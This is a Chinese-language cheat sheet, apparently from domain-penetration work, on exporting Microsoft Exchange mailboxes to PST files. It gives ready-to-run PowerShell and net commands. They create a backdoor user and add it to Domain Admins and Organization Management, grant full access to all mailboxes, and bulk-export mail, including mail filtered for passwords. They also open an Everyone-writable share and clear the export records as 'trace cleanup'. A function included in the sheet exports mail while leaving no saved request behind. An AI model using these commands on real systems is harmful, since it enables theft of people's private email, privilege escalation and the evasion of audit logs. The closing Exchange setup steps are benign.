Exchange邮件pst数据的导出与查看

相关命令

#不同Exchange版本对应的管理单元名称不同：
Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;
Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;
Exchange 2013 & 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

赋予一个用户查看其他用户邮件的权力

# 查看所有邮箱的权力
Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Admin')} | Add-MailboxPermission -User AdministratorAccount@contoso.com -AccessRights fullaccess -InheritanceType all

# 赋予用户a查看用户b邮箱的权力
Add-MailboxPermission -Identity ayla@contoso.com -User Ed@contoso.com -AccessRights fullaccess -InheritanceType all

提升 ‘scarlet’ 用户为域管权限 and 加入 Organization Management 组

net user scarlet 123456 /add
net group "domain admins" scarlet /add
net group "Organization Management" scarlet /add

获取所有用户的邮件地址并导出到all-email.csv

Get-Mailbox -ResultSize Unlimited |select displayname,PrimarySmtpAddress |Export-Csv -Encoding utf8 c:\temp\all-email.csv -NoTypeInformation

查看导出状态

Get-MailboxExportRequest

查看exchange给用户分的组

Get-DistributionGroup

查看IT Security组的详细信息

Get-DistributionGroup "IT Security" | fl

获取组中的成员信息

Get-DistributionGroupMember -Identity "IT Security"

获取admin用户的邮箱细节信息

get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

远程连接powershell来管理exchange

$User = "test\administrator"
$Pass = ConvertTo-SecureString -AsPlainText DomainAdmin123! -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://Exchange01.test.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

Get-PSSession

Get-Mailbox

查看组织内已创建的管理角色

Get-ManagementRole
Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName

给administrator添加邮件的导入导出权限

结束后需要重启EMS

#新建一个 Exchange 角色组并将其添加到 Mailbox Import Export 管理角色中
New-RoleGroup -Name "Enterprise Mail Support" -Roles "Mailbox Import Export" -Members administrator -Description "Import Export_Enterprise Support"

#给一个已经存在的名为Import Export_Domain Admins的组添加用户
New-ManagementRoleAssignment -Name "Import Export_Domain Admins"  -User "Administrator" -Role "Mailbox Import Export"

创建共享文件夹

mkdir c:\temp\PST
net share test$=c:\temp\PST /GRANT:Everyone,FULL

邮件的导出

#将user1收件箱的所有邮件导出

Inbox（收件箱）、SentItems（已发送邮件）、DeletedItems（已删除邮件）、Drafts（草稿）

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
New-MailboxExportRequest -Mailbox user1 -IncludeFolders "#Inbox#" -FilePath "\\hostname\test$\test.pst"

#导出用户 Tony 在 2012 年 1 月 1 日之后收到的邮件正文中包含“company”和“profit”的邮件。

New-MailboxExportRequest -Mailbox Tony `-ContentFilter {(body -like "*company*") `-and (body -like "*profit*") `-and (Received -gt "01/01/2012")} `-FilePath "\\hostname\test$\test.pst"

#导出all-email.csv中所有用户的邮件

$mail = import-csv -path "all-email.csv"
foreach ($user in $mail){ 
$Alias = $user.displayname
New-MailboxExportRequest -Mailbox $Alias -FilePath "\\hostname\test$\test.pst"
}

痕迹清理

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false

远程连接exchange并导出邮件

#远程连接
$User = "test\administrator"
$Pass = ConvertTo-SecureString -AsPlainText DomainAdmin123! -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://Exchange01.test.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

Get-PSSession

Get-Mailbox

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

#将用户administrator添加到导入导出邮件角色组
New-ManagementRoleAssignment –Role "Mailbox Import Export" –User test\administrator

#添加完成后进行确认
Get-ManagementRoleAssignment –Role "Mailbox Import Export"|fl user

# 导出邮件

在exchange服务器上直接导出

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
$User = "test1"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

powershell实现

需要知道高权限用户的凭据或者自己创建一个用户加入Organization Management组。

DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013

function DirectExportMailfromExchange
{
#Requires -Version 2.0
<#
.SYNOPSIS
This script will export the mail(.pst) from the Exchange server.
The script needs to be executed on the Exchange server.

Author: 3gstudent

.PARAMETER MailBox
The mail you want to export.

.PARAMETER ExportPath
The export path of the mail.
 
.PARAMETER $Filter
The search filter of the mail.

.PARAMETER $Version
The version of the Exhange.
It can be 2007,2010,2013 and 2016.

.EXAMPLE
PS C:\> DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013
#>
 	param (
        [Parameter(Mandatory = $True)]
		[string]$MailBox,
        [Parameter(Mandatory = $True)]
		[string]$ExportPath,
        [Parameter(Mandatory = $True)]
		[string]$Filter,
        [Parameter(Mandatory = $True)]
		[string]$Version
	)

    Write-Host "[>] Start to add PSSnapin" 
    if ($Version -eq 2007)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;
    }

    elseif ($Version -eq 2010)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;
    }

    else
    {
        
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
    }
  
    Write-Host "[+] Start to export mail" 
    #Export mail and do not save the export request
    New-MailboxexportRequest -mailbox $MailBox -ContentFilter {(body -like "*pass*")} -FilePath ($ExportPath+$MailBox+".pst") -CompletedRequestAgeLimit 0
    Write-Host "[+] All done."
}

查看pst文件数据

打开和关闭pst文件

也可以使用这个工具:pst viewer

补充

命令行下添加管理员用户

powershell -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;$pwd=convertto-securestring Password123 -asplaintext -force;New-Mailbox -UserPrincipalName testuser1@test.com -OrganizationalUnit test.com/Users -Alias testuser1 -Name testuser1 -DisplayName testuser1 -Password $pwd;Add-RoleGroupMember \"Organization Management\" -Member testuser1 -BypassSecurityGroupManagerCheck"

exchange搭建

1. 升级升级为域控制器
2. 添加iis、dns、AD服务
3. 加域
4. 登录到exchange的用户需要时domain admin、enterprise admin、schema admin组的人
5. 进入exchange的iso,打开cmd执行setup /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /prepareschema
6. 点击setup.exe安装
7. 为用户创建邮箱,可以在exchange server上用web端进行添加,也可以使用命令行添加,命令为:

#为张三添加邮箱
Enable-Mailbox -Identity zhangsan@test.com -Database UsersMailboxDatabase
#为所有用户添加邮箱
Get-User -RecipientTypeDetails User -Filter "UserPrincipalName -ne `$null" -ResultSize unlimited | Enable-Mailbox
#创建一个新用户的邮箱
New-Mailbox -Name "Pilar Pinilla" -UserPrincipalName pilarp@contoso.com -Password (ConvertTo-SecureString -String 'Pa$$word1' -AsPlainText -Force) -FirstName Pilar -LastName Pinilla

参考文章

【技术分享】域渗透之Exchange Server
[域渗透]Exchange邮件导出
渗透基础——从Exchange服务器上搜索和导出邮件
在邮箱中添加用户